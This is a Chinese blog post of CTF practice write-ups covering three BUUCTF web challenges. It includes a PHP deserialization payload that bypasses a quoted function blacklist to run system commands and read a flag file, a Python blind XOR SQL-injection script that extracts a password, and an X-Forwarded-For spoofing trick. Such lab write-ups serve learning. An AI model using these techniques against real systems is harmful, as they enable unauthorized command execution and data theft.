8月8日刷题

最新推荐文章于 2024-03-15 09:02:56 发布

ta3shi

最新推荐文章于 2024-03-15 09:02:56 发布

阅读量385

点赞数

分类专栏： ctfweb buuctf刷题记录

本文链接：https://blog.csdn.net/Realiy/article/details/107879791

版权

ctfweb 同时被 2 个专栏收录

12 篇文章 0 订阅

订阅专栏

buuctf刷题记录

12 篇文章 0 订阅

订阅专栏

[网鼎杯 2020 朱雀组]phpweb

f12发现有post数据

hackbar看一下

是call_user_func()函数，用file_get_contents读取一下index.php

   <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

禁用了一大堆函数，这里用序列化绕过

找了各种目录没找到，最后不得已用find来找

<?php
  class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $a=new Test();
    //$a->p='find / -name "*flag*"'
    $a->p='cat /tmp/flagoefiu4r93';
    $a->func='system';
    print_r($a);
    print_r(urlencode(serialize($a)));

[极客大挑战 2019]FinalSQL

打开之后登陆无果，然后在另一个页面发现注入，最后发现异或注入可用，（1^1^1=1,1^0^1=0）

上脚本吧

import requests as res
import time
url='http://89f27319-5436-4c7b-ae35-3b038bfdb4e2.node3.buuoj.cn/search.php?id='

rs=''

for i in range(1,50):
        high =127
        low = 32
        mid = (high+low)/2
        while(high>low):
                payload='1^(ascii(substr((select(group_concat(password))from(F1naI1y)where(username=\'flag\')),%d,1))>%d)^1'%(i,mid)
                #payload='1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'F1naI1y\')),%d,1))>%d)^1'%(i,mid)
                r=res.get(url+payload)
                time.sleep(1)
                print(payload)
                if 'NO! Not this! Click ot' in r.text:
                        low=mid+1
                else :
                        high=mid
                mid=(high+low)/2
        rs+=chr(int(mid))
        print("[+]:",rs)

找出来表里有Id,username,password然后username里有个flag，那么读他的密码就行了，这里记得加延时，不然会因为请求太快被ban

[MRCTF2020]PYWebsite

buy it now 扫码购买，他不给我让我好好想想，气抖冷

function enc(code){
      hash = hex_md5(code);
      return hash;
    }
    function validate(){
      var code = document.getElementById("vcode").value;
      if (code != ""){
        if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
          alert("您通过了验证！");
          window.location = "./flag.php"
        }else{
          alert("你的授权码不正确！");
        }
      }else{
        alert("请输入授权码");
      }
      
    }

源码发现验证方式，打开/flag.php他说是验证ip的于是直接加个xxf头127.0.0.1成功

ta3shi

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
8月8日刷题

[网鼎杯 2020 朱雀组]phpwebf12发现有post数据hackbar看一下是call_user_func()函数，用file_get_contents读取一下index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate",
复制链接

扫一扫